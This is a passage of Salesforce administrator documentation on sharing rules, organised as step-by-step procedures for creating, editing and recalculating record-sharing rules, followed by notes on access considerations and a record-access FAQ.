Sharing Rules Overview
Sharing Rule Categories

Creating Account Territory Sharing Rules

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Users”To create sharing rules:

Account territory sharing rules are based on territory assignment. You can define up to 300 account territory sharing rules.

1. If you plan to include public groups in your sharing rule, confirm that the appropriate groups have been created.
2. From Setup, click Security Controls > Sharing Settings.
3. In the Account Territory Sharing Rules related list, click New.
4. Enter the Label Name and Rule Name. The Label is the sharing rule label as it appears on the user interface. The Rule

Name is a unique name used by the API and managed packages.
5. In the Accounts in Territory line, select Territories or Territories and Subordinates from the first drop-down list and a

territory from the second drop-down list.
6. In the Share with line, specify the users who should have access to the data: select a category from the first drop-down

list and a set of users from the second drop-down list or lookup field.
7. Select a setting for Default Account, Contract and Asset Access.
8. In the remaining fields, select the access setting for the records associated with the shared account territories.

DescriptionAccess Setting

Users can’t view or update records, unless access is granted
outside of this sharing rule.

Private

(available for associated contacts, opportunities, and cases
only)

Users can view, but not update, records.Read Only

Users can view and update records.Read/Write
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Note: Contact Access is not available when the organization-wide default for contacts is set to Controlled
by Parent.

9. Click Save.

See Also:
Sharing Rules Overview
Sharing Rule Categories

Editing Account Territory Sharing Rules

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Users”To edit sharing rules:

For account territory sharing rules, you can edit the sharing access settings, but no other settings.

1. From Setup, click Security Controls > Sharing Settings.
2. In the Account Territory Sharing Rules related list, click Edit next to the rule you want to change.
3. Change the Label and Rule Name if desired.
4. Select the sharing access setting for users.

DescriptionAccess Setting

Users can’t view or update records, unless access is granted
outside of this sharing rule.

Private

(available for associated contacts, opportunities, and cases
only)

Users can view, but not update, records.Read Only

Users can view and update records.Read/Write

Note: Contact Access is not available when the organization-wide default for contacts is set to Controlled
by Parent.
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5. Click Save.

See Also:
Sharing Rules Overview
Sharing Rule Categories

Creating Contact Sharing Rules

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Users”To create sharing rules:

Contact sharing rules can be based on the record owner or on other criteria, including record type and certain field values.
You can define up to 300 contact sharing rules, including up to 50 criteria-based sharing rules.

1. If you plan to include public groups in your sharing rule, confirm that the appropriate groups have been created.
2. From Setup, click Security Controls > Sharing Settings.
3. In the Contact Sharing Rules related list, click New.
4. Enter the Label Name and Rule Name. The Label is the sharing rule label as it appears on the user interface. The Rule

Name is a unique name used by the API and managed packages.
5. Select a rule type.
6. Depending on the rule type you selected, do the following:

• Based on record owner—In the owned by members of line, specify the users whose records will be shared:
select a category from the first drop-down list and a set of users from the second drop-down list (or lookup field, if
your organization has over 200 queues, groups, roles, or territories).

• Based on criteria—Specify the Field, Operator, and Value criteria that records must match to be included in the
sharing rule. The fields available depend on the object selected, and the value is always a literal number or string. Click
Add Filter Logic... to change the default AND relationship between each filter.

Note: To use a field that’s not supported by criteria-based sharing rules, you can create a workflow rule or
Apex trigger to copy the value of the field into a text or numeric field, and use that field as the criterion.

7. In the Share with line, specify the users who should have access to the data: select a category from the first drop-down
list and a set of users from the second drop-down list or lookup field.

8. Select the sharing access setting for users.

DescriptionAccess Setting

Users can view, but not update, records.Read Only

Users can view and update records.Read/Write
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9. Click Save.

See Also:
Sharing Rules Overview
Sharing Rule Categories

Editing Contact Sharing Rules

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Users”To edit sharing rules:

For sharing rules that are based on owner, you can edit only the sharing access settings. For sharing rules that are based on
other criteria, you can edit the criteria and sharing access settings.

1. From Setup, click Security Controls > Sharing Settings.
2. In the Contact Sharing Rules related list, click Edit next to the rule you want to change.
3. Change the Label and Rule Name if desired.
4. If you selected a rule that's based on owner, skip to the next step.

If you selected a rule that's based on criteria, specify the criteria that records must match to be included in the sharing rule.
The fields available depend on the object selected, and the value must be a literal number or string. Click Add Filter
Logic... to change the default AND relationship between each filter.

5. Select the sharing access setting for users.

DescriptionAccess Setting

Users can view, but not update, records.Read Only

Users can view and update records.Read/Write

6. Click Save.

See Also:
Sharing Rules Overview
Sharing Rule Categories

408

Sharing Rules OverviewManage User Access to Data



Creating Opportunity Sharing Rules

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Users”To create sharing rules:

Opportunity sharing rules can be based on the record owner or on other criteria, including record type and certain field values.
You can define up to 300 opportunity sharing rules, including up to 50 criteria-based sharing rules.

1. If you plan to include public groups in your sharing rule, confirm that the appropriate groups have been created.
2. From Setup, click Security Controls > Sharing Settings.
3. In the Opportunity Sharing Rules related list, click New.
4. Enter the Label Name and Rule Name. The Label is the sharing rule label as it appears on the user interface. The Rule

Name is a unique name used by the API and managed packages.
5. Select a rule type.
6. Depending on the rule type you selected, do the following:

• Based on record owner—In the owned by members of line, specify the users whose records will be shared:
select a category from the first drop-down list and a set of users from the second drop-down list (or lookup field, if
your organization has over 200 queues, groups, roles, or territories).

• Based on criteria—Specify the Field, Operator, and Value criteria that records must match to be included in the
sharing rule. The fields available depend on the object selected, and the value is always a literal number or string. Click
Add Filter Logic... to change the default AND relationship between each filter.

Note: To use a field that’s not supported by criteria-based sharing rules, you can create a workflow rule or
Apex trigger to copy the value of the field into a text or numeric field, and use that field as the criterion.

7. In the Share with line, specify the users who should have access to the data: select a category from the first drop-down
list and a set of users from the second drop-down list or lookup field.

8. Select the sharing access setting for users. For owner-based rules or criteria-based rules with ownership as criteria, the
Opportunity Access level applies to opportunities owned by the group, role, or territory members, regardless of the
associated account.

DescriptionAccess Setting

Users can view, but not update, records.Read Only

Users can view and update records.Read/Write

409

Sharing Rules OverviewManage User Access to Data



9. Click Save.

See Also:
Sharing Rules Overview
Sharing Rule Categories

Editing Opportunity Sharing Rules

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Users”To edit sharing rules:

For sharing rules that are based on owner, you can edit only the sharing access settings. For sharing rules that are based on
other criteria, you can edit the criteria and sharing access settings.

1. From Setup, click Security Controls > Sharing Settings.
2. In the Opportunity Sharing Rules related list, click Edit next to the rule you want to change.
3. Change the Label and Rule Name if desired.
4. If you selected a rule that's based on owner, skip to the next step.

If you selected a rule that's based on criteria, specify the criteria that records must match to be included in the sharing rule.
The fields available depend on the object selected, and the value must be a literal number or string. Click Add Filter
Logic... to change the default AND relationship between each filter.

5. Select the sharing access setting for users. For owner-based rules or criteria-based rules with ownership as criteria, the
Opportunity Access level applies to opportunities owned by the group, role, or territory members, regardless of the
associated account.

DescriptionAccess Setting

Users can view, but not update, records.Read Only

Users can view and update records.Read/Write

6. Click Save.

See Also:
Sharing Rules Overview
Sharing Rule Categories
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Creating Case Sharing Rules

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Users”To create sharing rules:

Case sharing rules can be based on the record owner or on other criteria, including record type and certain field values. You
can define up to 300 case sharing rules, including up to 50 criteria-based sharing rules.

1. If you plan to include public groups in your sharing rule, confirm that the appropriate groups have been created.
2. From Setup, click Security Controls > Sharing Settings.
3. In the Case Sharing Rules related list, click New.
4. Enter the Label Name and Rule Name. The Label is the sharing rule label as it appears on the user interface. The Rule

Name is a unique name used by the API and managed packages.
5. Select a rule type.
6. Depending on the rule type you selected, do the following:

• Based on record owner—In the owned by members of line, specify the users whose records will be shared:
select a category from the first drop-down list and a set of users from the second drop-down list (or lookup field, if
your organization has over 200 queues, groups, roles, or territories).

• Based on criteria—Specify the Field, Operator, and Value criteria that records must match to be included in the
sharing rule. The fields available depend on the object selected, and the value is always a literal number or string. Click
Add Filter Logic... to change the default AND relationship between each filter.

Note: To use a field that’s not supported by criteria-based sharing rules, you can create a workflow rule or
Apex trigger to copy the value of the field into a text or numeric field, and use that field as the criterion.

7. In the Share with line, specify the users who should have access to the data: select a category from the first drop-down
list and a set of users from the second drop-down list or lookup field.

8. Select the sharing access setting for users.

DescriptionAccess Setting

Users can view, but not update, records.Read Only

Users can view and update records.Read/Write

9. Click Save.

See Also:
Sharing Rules Overview
Sharing Rule Categories
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Editing Case Sharing Rules

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Users”To edit sharing rules:

For sharing rules that are based on owner, you can edit only the sharing access settings. For sharing rules that are based on
other criteria, you can edit the criteria and sharing access settings.

1. From Setup, click Security Controls > Sharing Settings.
2. In the Case Sharing Rules related list, click Edit next to the rule you want to change.
3. Change the Label and Rule Name if desired.
4. If you selected a rule that's based on owner, skip to the next step.

If you selected a rule that's based on criteria, specify the criteria that records must match to be included in the sharing rule.
The fields available depend on the object selected, and the value must be a literal number or string. Click Add Filter
Logic... to change the default AND relationship between each filter.

5. Select the sharing access setting for users.

DescriptionAccess Setting

Users can view, but not update, records.Read Only

Users can view and update records.Read/Write

6. Click Save.

See Also:
Sharing Rules Overview
Sharing Rule Categories
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Creating Campaign Sharing Rules

Available in: Professional Edition for an additional cost, and Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Users”To create sharing rules:

Campaign sharing rules can be based on the record owner or on other criteria, including record type and certain field values.
You can define up to 300 campaign sharing rules, including up to 50 criteria-based sharing rules.

1. If you plan to include public groups in your sharing rule, confirm that the appropriate groups have been created.
2. From Setup, click Security Controls > Sharing Settings.
3. In the Campaign Sharing Rules related list, click New.
4. Enter the Label Name and Rule Name. The Label is the sharing rule label as it appears on the user interface. The Rule

Name is a unique name used by the API and managed packages.
5. Select a rule type.
6. Depending on the rule type you selected, do the following:

• Based on record owner—In the owned by members of line, specify the users whose records will be shared:
select a category from the first drop-down list and a set of users from the second drop-down list (or lookup field, if
your organization has over 200 queues, groups, roles, or territories).

• Based on criteria—Specify the Field, Operator, and Value criteria that records must match to be included in the
sharing rule. The fields available depend on the object selected, and the value is always a literal number or string. Click
Add Filter Logic... to change the default AND relationship between each filter.

Note: To use a field that’s not supported by criteria-based sharing rules, you can create a workflow rule or
Apex trigger to copy the value of the field into a text or numeric field, and use that field as the criterion.

7. In the Share with line, specify the users who should have access to the data: select a category from the first drop-down
list and a set of users from the second drop-down list or lookup field.

8. Select the sharing access setting for users.

DescriptionAccess Setting

Users can view, but not update, records.Read Only

Users can view and update records.Read/Write

Any user in the selected group, role, or territory can view, edit, transfer, delete,
and share the record, just like the record’s owner.

With a Full Access sharing rule, users can also view, edit, delete, and close
activities associated with the record if the organization-wide sharing setting for
activities is Controlled by Parent.

Full Access
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9. Click Save.

See Also:
Sharing Rules Overview
Sharing Rule Categories

Editing Campaign Sharing Rules

Available in: Professional Edition for an additional cost, and Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Users”To edit sharing rules:

For sharing rules that are based on owner, you can edit only the sharing access settings. For sharing rules that are based on
other criteria, you can edit the criteria and sharing access settings.

1. From Setup, click Security Controls > Sharing Settings.
2. In the Campaign Sharing Rules related list, click Edit next to the rule you want to change.
3. Change the Label and Rule Name if desired.
4. If you selected a rule that's based on owner, skip to the next step.

If you selected a rule that's based on criteria, specify the criteria that records must match to be included in the sharing rule.
The fields available depend on the object selected, and the value must be a literal number or string. Click Add Filter
Logic... to change the default AND relationship between each filter.

5. Select the sharing access setting for users.

DescriptionAccess Setting

Users can view, but not update, records.Read Only

Users can view and update records.Read/Write

Any user in the selected group, role, or territory can view, edit, transfer, delete,
and share the record, just like the record’s owner.

With a Full Access sharing rule, users can also view, edit, delete, and close
activities associated with the record if the organization-wide sharing setting for
activities is Controlled by Parent.

Full Access
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6. Click Save.

See Also:
Sharing Rules Overview
Sharing Rule Categories

Creating Quick Text Sharing Rules

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Users”To create sharing rules:

To create Quick Text sharing rules:

1. If you plan to include public groups in your sharing rule, confirm that the appropriate groups have been created.
2. From Setup, click Security Controls > Sharing Settings.
3. In the Quick Text Sharing Rules related list, click New.
4. Enter the Label Name and Rule Name. The Label is the sharing rule label as it appears on the user interface. The Rule

Name is a unique name used by the API and managed packages.
5. In the Quick Text: owned by members of line, specify the users who own the data by selecting a category from the

first drop-down list and a set of users from the second drop-down list.
6. In the Share with line, specify the users who should have access to the data: select a category from the first drop-down

list and a set of users from the second drop-down list or lookup field.
7. Select the sharing access setting for users.

DescriptionAccess Setting

Users can view, but not update, records.Read Only

Users can view and update records.Read/Write

8. Click Save.

See Also:
Sharing Rules Overview
Sharing Rule Categories
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Creating Custom Object Sharing Rules

Available in: Enterprise, Unlimited, Developer, and Database.com Editions

User Permissions Needed

“Manage Users”To create sharing rules:

Custom object sharing rules can be based on the record owner or on other criteria, including record type and certain field
values. You can define up to 300 custom object sharing rules, including up to 50 criteria-based sharing rules.

1. If you plan to include public groups in your sharing rule, confirm that the appropriate groups have been created.
2. From Setup, click Security Controls > Sharing Settings.
3. In the Sharing Rules related list for the custom object, click New.
4. Enter the Label and Rule Name. The Label is the sharing rule label as it appears on the user interface. The Rule Name is

a unique name used by the API and managed packages.
5. Select a rule type.
6. Depending on the rule type you selected, do the following:

• Based on record owner—In the owned by members of line, specify the users whose records will be shared:
select a category from the first drop-down list and a set of users from the second drop-down list (or lookup field, if
your organization has over 200 queues, groups, roles, or territories).

• Based on criteria—Specify the Field, Operator, and Value criteria that records must match to be included in the
sharing rule. The fields available depend on the object selected, and the value is always a literal number or string. Click
Add Filter Logic... to change the default AND relationship between each filter.

Note: To use a field that’s not supported by criteria-based sharing rules, you can create a workflow rule or
Apex trigger to copy the value of the field into a text or numeric field, and use that field as the criterion.

7. In the Share with line, specify the users who should have access to the data: select a category from the first drop-down
list and a set of users from the second drop-down list or lookup field.

8. Select the sharing access setting for users.

DescriptionAccess Setting

Users can view, but not update, records.Read Only

Users can view and update records.Read/Write

9. Click Save.

See Also:
Sharing Rules Overview
Sharing Rule Categories
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Editing Custom Object Sharing Rules

Available in: Enterprise,, Unlimited, Developer, and Database.com Editions.

User Permissions Needed

“Manage Users”To edit sharing rules:

For sharing rules that are based on owner, you can edit only the sharing access settings. For sharing rules that are based on
other criteria, you can edit the criteria and sharing access settings.

1. From Setup, click Security Controls > Sharing Settings.
2. In the Sharing Rules related list for the custom object, click Edit next to the rule you want to change.
3. Change the Label and Rule Name if desired.
4. If you selected a rule that's based on owner, skip to the next step.

If you selected a rule that's based on criteria, specify the criteria that records must match to be included in the sharing rule.
The fields available depend on the object selected, and the value must be a literal number or string. Click Add Filter
Logic... to change the default AND relationship between each filter.

5. Select the sharing access setting for users.

DescriptionAccess Setting

Users can view, but not update, records.Read Only

Users can view and update records.Read/Write

6. Click Save.

See Also:
Sharing Rules Overview
Sharing Rule Categories
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Sharing Rule Considerations

Account and contact sharing rules are available in: Professional, Enterprise, Unlimited, and Developer Editions

Account territory, case, lead, opportunity, and custom object sharing rules are available in: Enterprise, Unlimited, and
Developer Editions

Campaign sharing rules are available in Professional Edition for an additional cost, and Enterprise, Unlimited, and
Developer Editions

Only custom object sharing rules are available in Database.com

Sharing rules allow you to selectively grant data access to defined sets of users. Review the following notes before using sharing
rules:

Granting Access

• You can use sharing rules to grant wider access to data. You cannot restrict access below your organization-wide
default levels.

• If multiple sharing rules give a user different levels of access to a record, the user gets the most permissive access level.

• Sharing rules automatically grant additional access to related records. For example, opportunity sharing rules give
role or group members access to the account associated with the shared opportunity if they do not already have it.
Likewise, contact and case sharing rules provide the role or group members with access to the associated account as
well.

• Users in the role hierarchy are automatically granted the same access that users below them in the hierarchy have
from a sharing rule, provided that the object is a standard object or the Grant Access Using Hierarchies option is
selected.

• Regardless of sharing rules, users can, at a minimum, view the accounts in their territories. Also, users can be granted
access to view and edit the contacts, opportunities, and cases associated with their territories’ accounts.

Updating

• Once a sharing rule has been saved, you can’t change the Share with field settings when you edit the sharing rule.

• Sharing rules apply to all new and existing records that meet the definition of the source data set.

• Sharing rules apply to both active and inactive users.

• When you change the access levels for a sharing rule, all existing records are automatically updated to reflect the new
access levels.

• When you delete a sharing rule, the sharing access created by that rule is automatically removed.

• When you modify which users are in a group, role, or territory, the sharing rules are reevaluated to add or remove
access as necessary.

• When you transfer records from one user to another, the sharing rules are reevaluated to add or remove access to the
transferred records as necessary.

• Making changes to sharing rules may require changing a large number of records at once. To process these changes
efficiently, your request may be queued and you may receive an email notification when the process has completed.

• Lead sharing rules do not automatically grant access to lead information after leads are converted into account,
contact, and opportunity records.
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Portal Users

• You can create rules to share records between most types of Customer Portal users and Salesforce users. Similarly,
you can create sharing rules between Customer Portal users from different accounts as long as they have the Customer
Portal Manager user license. However, you can’t include high-volume portal users in sharing rules because they don’t
have roles and can’t be in public groups.

• You can easily convert sharing rules that include Roles, Internal and Portal Subordinates to include Roles and Internal
Subordinates instead by using the Convert Portal User Access wizard. Furthermore, you can use this wizard to convert
any publicly accessible report, dashboard, and document folders to folders that are accessible by all users except for
portal users.

See Also:
Sharing Rules Overview

Sharing Considerations
Your organization’s sharing model gives users access to records they do not own. The sharing model is a complex relationship
between role hierarchies, user permissions, sharing rules, and exceptions for certain situations. Review the following notes
before setting your sharing model:

Exceptions to Role Hierarchy-based Sharing

Users can always view and edit all data owned by or shared with users below them in the role hierarchy. Exceptions to this
include:

• An option on your organization-wide default allows you to ignore the hierarchies when determining access to data.
• Contacts that are not linked to an account are always private. Only the owner of the contact and administrators can view

it. Contact sharing rules do not apply to private contacts.
• Notes and attachments marked as private via the Private checkbox are accessible only to the person who attached them

and administrators.
• Events marked as private via the Private checkbox are accessible only by the event owner. Other users cannot see the

event details when viewing the event owner’s calendar. However, users with the “View All Data” or “Modify All Data”
permission can see private event details in reports and searches, or when viewing other users’ calendars.

• Users above a record owner in the role hierarchy can only view or edit the record owner’s records if they have the “Read”
or “Edit” object permission for the type of record

• Visibility to users as a result of the Community User Visibility preference is not inherited through the role hierarchy. If
a manager in the role hierarchy is not a member of a community, but their subordinate is, the manager does not gain access
to other members of the community. This only applies if Salesforce Communities is enabled in your organization.

Deleting Records

• The ability to delete individual records is controlled by administrators, the record owner, users in a role hierarchy above
the record owner, and any user that has been granted “Full Access.”

• If the sharing model is set to Public Read/Write/Transfer for cases or leads or Public Full Access for campaigns, any user
can delete those types of records.
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Adding Related Items to a Record

• You must have “Read/Write” access to a record to be able to add notes or attachments to the record.
• You must have at least “Read” access to a record to be able to add activities or other associated records to it.

Adding or Removing Sharing Access Manually

• The ability to manually extend the sharing access of individual records is controlled by administrators, the record owner,
users in a role hierarchy above the record owner, and any user that has been granted “Full Access.”

• Changing your sharing model deletes any manual shares your users have created.

User Permissions and Object-Level Permissions

While your sharing model controls visibility to records, user permissions and object-level permissions control what users can
do to those records.

• Regardless of the sharing settings, users must have the appropriate object-level permissions. For example, if you share an
account, those users can only see the account if they have the “Read” permission on accounts. Likewise, users who have
the “Edit” permission on contacts may still not be able to edit contacts they do not own if they are working in a Private
sharing model.

• Administrators, and users with the “View All Data” or “Modify All Data” permissions, have access to view or edit all data.

Account Sharing

• To restrict users’ access to records they do not own that are associated with accounts they do own, set the appropriate access
level on the role. For example, you can restrict a user’s access to opportunities they do not own yet are associated with
accounts they do own using the Opportunity Access option.

• Regardless of the organization-wide defaults, users can, at a minimum, view the accounts in their territories. Also, users
can be granted access to view and edit the contacts, opportunities, and cases associated with their territories’ accounts.

Apex Sharing

• The organization-wide default settings can’t be changed from private to public for a custom object if Apex code uses the
sharing entries associated with that object. For example, if Apex code retrieves the users and groups who have sharing
access on a custom object Invoice__c (represented as Invoice__share in the code), you can’t change the object’s
organization-wide sharing setting from private to public.

Campaign Sharing

• In Enterprise, Unlimited, and Developer Editions, designate all users as Marketing Users when enabling campaign sharing.
This simplifies administration and troubleshooting because access can be controlled using sharing and profiles.

Note:  Professional Edition customers cannot manage users this way because custom profiles are not enabled in
Professional Edition organizations.

• To segment visibility between business units while maintaining existing behavior within a business unit:

1. Set the campaign organization-wide default to Private.
2. Create a sharing rule to grant marketing users Public Full Access to all campaigns owned by users within their business

unit.
3. Create a sharing rule to grant all non-marketing users in a business unit Read Only access to all campaigns owned by

users in their business unit.
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• When a single user, such as a regional marketing manager, owns multiple campaigns and needs to segment visibility
between business units, share campaigns individually instead of using sharing rules. Sharing rules apply to all campaigns
owned by a user and do not allow segmenting visibility.

• Create all campaign sharing rules prior to changing your organization-wide default to reduce the affect the change has on
your users.

• To share all campaigns in your organization with a group of users or a specific role, create a sharing rule that applies to
campaigns owned by members of the “Entire Organization” public group.

• Minimize the number of sharing rules you need to create by using the “Roles and Subordinates” option instead of choosing
a specific role.

• If campaign hierarchy statistics are added to the page layout, a user can see aggregate data for a parent campaign and all
the campaigns below it in the hierarchy regardless of whether that user has sharing rights to a particular campaign within
the hierarchy. Therefore, consider your organization’s campaign sharing settings when enabling campaign hierarchy
statistics. If you do not want users to see aggregate hierarchy data, remove any or all of the campaign hierarchy statistics
fields from the Campaign Hierarchy related list. These fields will still be available for reporting purposes.

• If the sharing model is set to Public Full Access for campaigns, any user can delete those types of records.

Campaign Member Sharing

Campaign member sharing is controlled by campaign sharing rules. Users that can see a campaign can also see associated
campaign members.

Contact Sharing

• The organization-wide sharing default for contacts is not available to organizations that have person accounts enabled.
• If your organization-wide default for contacts is set to Controlled by Parent, the Contact Access options are not available

when sharing related records like accounts; instead, all access to contacts is determined by the user's access to the contact's
account.

Price Book Sharing

• Sharing on price books controls whether users can add the price book and its products to opportunities.
• User permissions control whether users can view, create, edit, and delete price books.

See Also:
Overview of Sharing Settings

Viewing Sharing Overrides
Available in: Professional, Enterprise, Unlimited, Developer, and Database.com Editions

User Permissions Needed

“View Setup and Configuration”To view sharing overrides:

When you select an object in the Sharing Settings page, the page includes a Sharing Overrides related list, which shows any
profiles that ignore sharing settings for that object.
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To view the Sharing Overrides list, click Security Controls > Sharing Settings, then select an object from the Manage Sharing
Settings For list.

For each profile, the list specifies the permissions that allow it to override sharing settings. The “View All Data” and “Modify
All Data” permissions override sharing settings for all objects in the organization, while the object permissions “View All” and
“Modify All” override sharing settings for the named object.

Note:  The Sharing Overrides list doesn't show permissions granted through permission sets, which may also override
sharing settings for an object.

To override sharing settings for specific objects, you can create or edit permission sets or profiles and enable the “View All”
and “Modify All” object permissions. These permissions provide access to all records associated with an object across the
organization, regardless of the sharing settings. Before setting these permissions, compare the different ways to control data
access.

See Also:
User Profiles Overview

SHARING CALCULATIONS

Recalculating Sharing Rules
Account and contact sharing rules are available in: Professional, Enterprise, Unlimited, and Developer Editions

Account territory, case, lead, and opportunity sharing rules are available in: Enterprise, Unlimited, and Developer Editions

Campaign sharing rules are available in Professional Edition for an additional cost, and Enterprise, Unlimited, and
Developer Editions

Custom object sharing rules are available in: Enterprise, Unlimited, Developer, and Database.com Editions.

User Permissions Needed

“Manage Users”To recalculate sharing rules:

When you make changes to groups, roles, and territories, sharing rules are usually automatically reevaluated to add or remove
access as necessary. Changes could include adding or removing individual users from a group, role, or territory, changing which
role a particular role reports to, changing which territory a particular territory is subordinate to, or adding or removing a group
from within another group. However, if these changes affect too many records at once, a message appears warning that the
sharing rules won’t be automatically reevaluated, and you must manually recalculate them.
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Note:

You don’t have to recalculate each time you edit or create a new sharing rule. The Recalculate buttons on the Sharing
Rules related lists should only be used if sharing rule updates have failed or are not working as expected. Administrators
will receive a notification email if sharing rule updates have failed.

To manually recalculate an object’s sharing rules:

1. From Setup, click Security Controls > Sharing Settings.
2. In the Sharing Rules related list for the object you want, click Recalculate.
3. If you want to monitor the progress of a recalculation, from Setup, click Monitoring > Background Jobs or Jobs >

Background Jobs.

Note:  The Recalculate button is disabled when group membership or sharing rule calculations are deferred.

When sharing is recalculated, Salesforce also runs all Apex sharing recalculations.

Automatic sharing rule calculation is enabled by default. You can defer sharing rule calculation by suspending and resuming
at your discretion.

See Also:
Sharing Rules Overview
Defer Sharing Calculations Overview
Monitoring Background Jobs
Parallel Recalculation

Parallel Recalculation
Available in: Professional, Enterprise, Unlimited, Developer, and Database.com Editions

When you update the organization-wide defaults or create, update, or delete a sharing rule, the recalculation is run synchronously
and typically completes within a few minutes. The same is true for recalculation triggered by updates, such as role or membership
changes. However, when the changes affects a large amount of data, the recalculation can take a longer time and can terminate
during feature or patch releases.

Note:  Parallel recalculation recalculates the sharing rules asynchronously in the background, based on server load. If
your organization encounters long-running recalculations when working with sharing rules, contact salesforce.com
to determine if you need this feature.

You can monitor the progress of your parallel recalculation in the Background Jobs page. For organizations with parallel
recalculation enabled, take note of these behaviors:

Creating or updating a sharing rule:

• Recalculation continues in the background and an email notification is sent upon completion.
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• If you are creating a new sharing rule and receive an email notifying a failed attempt, delete the rule from the Sharing
Settings page and try again.

• If you are updating a sharing rule and receive an email notifying a failed attempt, recalculate the sharing rule by clicking
Recalculate for the object on the Sharing Settings page.

Updating the organization-wide default:

• Recalculation continues in the background and an email notification is sent upon completion.

Note:  For an in-depth look at record access, see Designing Record Access for Enterprise Scale.

See Also:
Monitoring Background Jobs
Sharing Rules Overview
Recalculating Sharing Rules

Defer Sharing Calculations Overview
Available in: Enterprise, Unlimited, Developer, and Database.com Editions

Note:  The defer sharing calculation feature isn't enabled by default. To enable it for your organization, contact
salesforce.com.

Performing a large number of configuration changes can lead to very long sharing rule evaluations or timeouts. To avoid these
issues, an administrator can suspend these calculations and resume calculations during an organization's maintenance period.

Deferring sharing calculation is ideal if you make a large number of changes to roles, territories, groups, users, portal account
ownership, or public groups participating in sharing rules, and want to suspend the automatic sharing calculation to a later
time.

Group membership and sharing rule calculation are enabled by default.

You canIf

Group membership and sharing rule calculation are enabled • Suspend, update, and resume group membership
calculation. This suspends sharing rule calculation and
requires a full recalculation of sharing rules.

• Suspend, update, and resume sharing rule calculation.

Suspend, update, and, resume group membership calculation.Group membership calculation is enabled and sharing rule
calculation is suspended

Suspend, update, resume, and recalculate sharing rule
calculation.

Group membership calculation is suspended and sharing rule
calculation is enabled
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To suspend or resume group membership calculation, see Managing Group Membership Calculations.

To suspend, resume, or recalculate sharing rule calculation, see Deferring Sharing Rule Calculations.

See Also:
Recalculating Sharing Rules

Managing Group Membership Calculations

Available in: Enterprise, Unlimited, Developer, and Database.com Editions

User Permissions Needed

“Manage Users”

AND

“Manage Sharing Calculation Deferral”

To defer (suspend and resume) sharing calculations:

When you make changes to roles, territories, groups, or users, or change ownership of portal accounts, group membership is
automatically recalculated to add or remove access as necessary. Changes can include adding or removing a user from a group
or changing a role to allow access to different sets of reports.

If you are making changes to groups that affect a lot of records, you may want to suspend automatic group membership
calculation and resume at a later time. Note that you might experience sharing inconsistencies in your records if you don’t
resume calculation.

To suspend or resume group membership calculation:

1. From Setup, click Security Controls > Defer Sharing Calculations.
2. In the Group Membership Calculations related list, click Suspend.

Note:  If sharing rule calculations are enabled, suspending group membership calculations also suspends sharing
rule calculations. Resuming group membership calculations also requires full sharing rule recalculation.

3. Make your changes to roles, territories, groups, users, or portal account ownership.
4. To enable group membership calculation, click Resume.

See Also:
Defer Sharing Calculations Overview
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Deferring Sharing Rule Calculations

Account and contact sharing rules are available in: Professional, Enterprise, Unlimited, and Developer Editions

Account territory, case, lead, and opportunity, sharing rules are available in: Enterprise, Unlimited, and Developer Editions

Campaign sharing rules are available in Professional Edition for an additional cost, and Enterprise, Unlimited, and
Developer Editions

Custom object sharing rules are available in: Enterprise, Unlimited, Developer, and Database.com Editions.

User Permissions Needed

“Manage Users”

AND

“Manage Sharing Calculation Deferral”

To defer (suspend and resume) and recalculate sharing rules::

Note:  The defer sharing calculation feature isn't enabled by default. To enable it for your organization, contact
salesforce.com.

To suspend, resume, or recalculate sharing rule calculation:

1. From Setup, click Security Controls > Defer Sharing Calculations.
2. In the Sharing Rule Calculations related list, click Suspend.
3. Make changes to sharing rules, roles, territories, or public groups participating in sharing rules.

Note:  Any changes to sharing rules require a full recalculation.

To enable sharing rule calculation, click Resume.
4. To manually recalculate sharing rules, click Recalculate.

Consider deferring your sharing calculations before performing massive updates to sharing rules. When sharing is recalculated,
Salesforce also runs all Apex sharing recalculations.

See Also:
Managing Group Membership Calculations
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Built-in Sharing Behavior
Sharing for accounts and contacts is available in: Professional, Enterprise, Unlimited, and Developer Editions

Sharing for cases and opportunities is available in Enterprise, Unlimited, and Developer Editions

Salesforce provides implicit sharing between accounts and child records (an opportunity, case, or contact), and for various
groups of portal users.

Sharing between accounts and child entities

• Access to a parent account—If you have access to an account’s child record, you have implicit Read Only access to
that account.

• Access to child entities—If you have access to a parent account, you can have access to the associated child entities.
The account owner's role determines the level of access to child entities.

Built-in sharing behavior for portal users

• Account and case access—An account’s portal user has Read Only access to the parent account and to all of the
account’s contacts.

• Management access to data owned by Service Cloud portal users—Since Service Cloud portal users don't have
roles, portal account owners can't access their data via the role hierarchy. To grant them access to this data, you can
add account owners to the portal’s share group where the Service Cloud portal users are working. This step provides
access to all data owned by Service Cloud portal users in that portal.

• Case access—If a portal user is a contact on a case, then the user has Read Only access on the case.

Group membership operations and sharing recalculation

Simple operations such as changing a user’s role, moving a role to another branch in the hierarchy, or changing a portal
account’s owner can trigger a recalculation of sharing rules. Salesforce must check access to user’s data for people who
are above the user’s new or old role in the hierarchy, and either add or remove shares to any affected records.

Note:  These sharing behaviors simplify administration for data access but can impact the performance of mass data
loads and updates. For best practices on designing record access in a large organization, see Designing Record Access
for Enterprise Scale.

See Also:
Securing Data Access

Record Access FAQ
• Why does a user have access to an account?

• Why can’t a user see a record?
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Why does a user have access to an account?
A user may have access to an account from:

• Record Ownership

• Implicit access from an associated child record such as a case, contact, or opportunity

• Organization-wide sharing defaults

• Role hierarchy

• Sharing rules

• Manual sharing

• Account team or territory

To find out why a user have access to the record, click the Sharing button on the account detail page to see a list of users who
have access and for which reasons. Click Expand List to see all users who have access.

The following users don’t show up in the list even if they may have access:

• All users, if the organization-wide defaults are set to Public Read Only or Public Read/Write

• High-volume portal users

Note:

If the Sharing button does not appear, the organization-wide sharing defaults may have been set to Controlled by
Parent or Public Read. Otherwise, only the record owner, an administrator, or a user above the owner in the role
hierarchy can see the Sharing Detail page.

